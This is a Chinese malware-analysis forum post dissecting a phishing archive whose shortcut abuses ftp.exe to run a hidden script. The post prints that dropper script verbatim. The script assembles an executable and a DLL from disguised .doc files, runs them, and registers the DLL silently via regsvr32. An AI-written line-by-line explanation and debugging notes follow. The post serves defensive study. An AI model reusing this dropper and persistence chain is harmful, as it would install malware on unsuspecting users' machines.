吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3535|回复: 36
上一主题 下一主题
收起左侧

[PC样本分析] 一个简单的钓鱼样本分析

  [复制链接]
跳转到指定楼层
楼主
神奇的人鱼 发表于 2025-8-20 10:54 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 神奇的人鱼 于 2025-8-20 10:55 编辑

样本是一个压缩包

其中文件夹是隐藏格式,另一个是一个快捷方式

指向路径为 C:\Windows\System32\ftp.exe -s"":_/_/_/_/_/_/_/_/_
这个的作用是执行一个恶意的脚本文件_
内容如下:
[Visual Basic] 纯文本查看 复制代码
!call copy /Y "_\_\_\_\_\_\_\_\doc\*.*" "_\" >nul
!call start /max explorer _
!call mkdir C:\Users\Public\Update >nul
!call copy /Y _\_\_\_\_\_\_\_\_rels\header.doc C:\Users\Public\Update\header >nul
!call copy /Y _\_\_\_\_\_\_\_\_rels\sc.doc C:\Users\Public\Update\sc >nul
!call copy /Y _\_\_\_\_\_\_\_\_rels\%TIME:~4,1%.doc C:\Users\Public\Update\shell32 >nul
!call echo %RANDOM%>>C:\Users\Public\Update\shell32 >nul
!call copy /Y /b C:\Users\Public\Update\header+C:\Users\Public\Update\shell32 C:\Users\Public\Update\360.%TIME:~4,1% >nul
!call copy /Y /b C:\Users\Public\Update\header+_\_\_\_\_\_\_\_\_rels\WindowsSecurity.doc C:\Users\Public\Update\%TIME:~3,1%.exe >nul
!call start C:\Users\Public\Update\%TIME:~3,1%.exe -InstallLsp C:\Users\Public\Update\360.%TIME:~4,1% >nul
!IF NOT EXIST C:\Users\Public\WinVer.dll (copy /Y /b _\_\_\_\_\_\_\_\_rels\header.doc+_\_\_\_\_\_\_\_\_rels\WinVer.doc C:\Users\Public\WinVer.dll && regsvr32 /s C:\Users\Public\WinVer.dll)
quit

找ai解释一下:

这个脚本是一个 Windows 批处理(Batch)脚本,其中包含了一些可疑的、甚至可能是恶意的行为。它使用了混淆路径(如 _\_\_\_)和系统环境变量(如 %TIME%%RANDOM%),目的是隐藏真实意图。下面我们逐行分析并解释其行为,并指出潜在的安全风险。


🔍 脚本逐行解析

!call copy /Y "_\_\_\_\_\_\_\_\doc\*.*" "_\" >nul
  • 解释:将 _ 目录下的 doc 文件夹中所有文件复制到根 _ 目录下,覆盖已有文件。
  • >nul 表示不输出结果(静默执行)。
  • !call 可能是伪装或错误写法,正常应为 call
  • 可疑点:路径 _\_\_\_... 是明显人为构造的混淆路径,可能用于绕过检测。

!call start /max explorer _
  • 解释:打开资源管理器,定位到名为 _ 的目录,并最大化窗口。
  • 用途推测:可能是为了引导用户查看某个文件或制造干扰。

!call mkdir C:\Users\Public\Update >nul
  • 解释:在公共用户目录下创建一个名为 Update 的文件夹。
  • 常见位置C:\Users\Public\ 是所有用户可访问的目录,常被恶意软件用来存放持久化文件。

!call copy /Y _\_\_\_\_\_\_\_\_rels\header.doc C:\Users\Public\Update\header >nul
  • 解释:复制一个名为 header.doc 的文件到 Update 文件夹并重命名为 header(无扩展名)。
  • 注意.doc 不一定是 Word 文档,可能是伪装的可执行内容。

!call copy /Y _\_\_\_\_\_\_\_\_rels\sc.doc C:\Users\Public\Update\sc >nul
  • 类似上一条,复制 sc.docsc(无扩展名)。
  • 可能是某个 payload 或 shellcode 的片段。

!call copy /Y _\_\_\_\_\_\_\_\_rels\%TIME:~4,1%.doc C:\Users\Public\Update\shell32 >nul
  • 解释:根据当前时间的第5个字符(如 :30.50 中的 3)选择一个文件(如 3.doc)复制为 shell32(无扩展名)。
  • 动态性:利用 %TIME% 提取单个字符作为文件名,可能是为了反分析或触发特定逻辑。

!call echo %RANDOM%>>C:\Users\Public\Update\shell32 >nul
  • 解释:向 shell32 文件末尾追加一个随机数。
  • 目的:修改文件内容,可能用于生成密钥、混淆、或破坏签名验证。

!call copy /Y /b C:\Users\Public\Update\header+C:\Users\Public\Update\shell32 C:\Users\Public\Update\360.%TIME:~4,1% >nul
  • 解释:以二进制模式(/b)合并 headershell32 文件,生成一个新文件 360.X(X 是时间中的某个数字)。
  • 推测用途:拼接出一个可执行 payload,360 可能模仿“360安全卫士”进行伪装。

!call copy /Y /b C:\Users\Public\Update\header+_\_\_\_\_\_\_\_\_rels\WindowsSecurity.doc C:\Users\Public\Update\%TIME:~3,1%.exe >nul
  • 解释:合并 headerWindowsSecurity.doc,生成一个 .exe 文件,名字由时间第4个字符决定(如 : 或数字)。
  • 严重警告:这是在创建一个可执行程序,名字伪装成与“Windows 安全”相关,具有社会工程学欺骗性。

!call start C:\Users\Public\Update\%TIME:~3,1%.exe -InstallLsp C:\Users\Public\Update\360.%TIME:~4,1% >nul
  • 解释:运行上一步生成的 .exe 文件,传入参数 -InstallLsp 和另一个拼接出的文件路径。

!IF NOT EXIST C:\Users\Public\WinVer.dll (
    copy /Y /b _\_\_\_\_\_\_\_\_rels\header.doc+_\_\_\_\_\_\_\_\_rels\WinVer.doc C:\Users\Public\WinVer.dll &&
    regsvr32 /s C:\Users\Public\WinVer.dll
)
  • 解释:如果 WinVer.dll 不存在,则:
    1. 合并两个 .doc 文件生成 WinVer.dll
    2. 使用 regsvr32 静默注册该 DLL(即加载并执行其代码)
  • 高危行为
    • regsvr32.exe 是合法系统工具,但常被用于 无文件攻击(fileless attack)
    • .dll 被注册后可能实现持久化、提权或后门功能
    • 名称 WinVer.dll 伪装成系统文件(真实 winver.exe 是版本查看器)

quit
  • 解释:退出脚本(但 quit 不是标准 batch 命令;应为 exit
  • 可能只是结束标记。

最终在update目录下生成的文件

通过x64dbg进行调试,需要按照脚本里面的方式更改命令行
"<实际路径>\Update\2.exe" -InstallLsp "<实际路径>\Update\360.2"
最终是解密出一个shellcode

然后外联恶意ip,但是因为这个ip已经关闭了端口,所以没办法继续分析了

压缩包sha1:5A735BD3402052CB80124CB855503E7DEF6AD696

免费评分

参与人数 9吾爱币 +9 热心值 +9 收起 理由
yybaoyymmm + 1 + 1 谢谢@Thanks!
binghe01 + 1 + 1 谢谢@Thanks!
junjia215 + 1 + 1 用心讨论,共获提升!
ytfh1131 + 1 + 1 谢谢@Thanks!
BrutusScipio + 1 + 1 用心讨论,共获提升!
52kail + 1 + 1 用心讨论,共获提升!
EEDDA + 1 + 1 我很赞同!
lsq132273 + 1 + 1 热心回复!
FZZZP + 1 + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
qiaohe1983 发表于 2025-8-21 13:09
不懂代码的人也能被清晰和逻辑的文字描述了解意图,而且还知道了几个代码的意思和用法。虽然这样详细的描述对于高手来说很浪费时间和无意义,但对于不懂和初学的人来说,受益匪浅。希望多一些类似此篇样本分析的实战基础指导和说明。
3#
ngxdlk 发表于 2025-8-20 11:49
4#
iaon 发表于 2025-8-20 13:23
5#
xiaoshengzi 发表于 2025-8-20 14:32
分析过程逻辑清晰明了透彻,感谢分享,受教了,大佬V587~~~
6#
骑狗的猴子 发表于 2025-8-21 08:47
厉害了分析的这么清楚,一看就知道在干嘛了
7#
或许。 发表于 2025-8-21 09:15
感谢分享
8#
qvbydc 发表于 2025-8-21 09:23
厉害了分析的这么清楚,一看就知道在做什么,学到了
9#
msjf520 发表于 2025-8-21 13:49
我认认真真的打来来学习钓鱼,结果不是我要的鱼
10#
xiaoyixian 发表于 2025-8-21 14:45
感谢分享
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-2-16 22:01

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表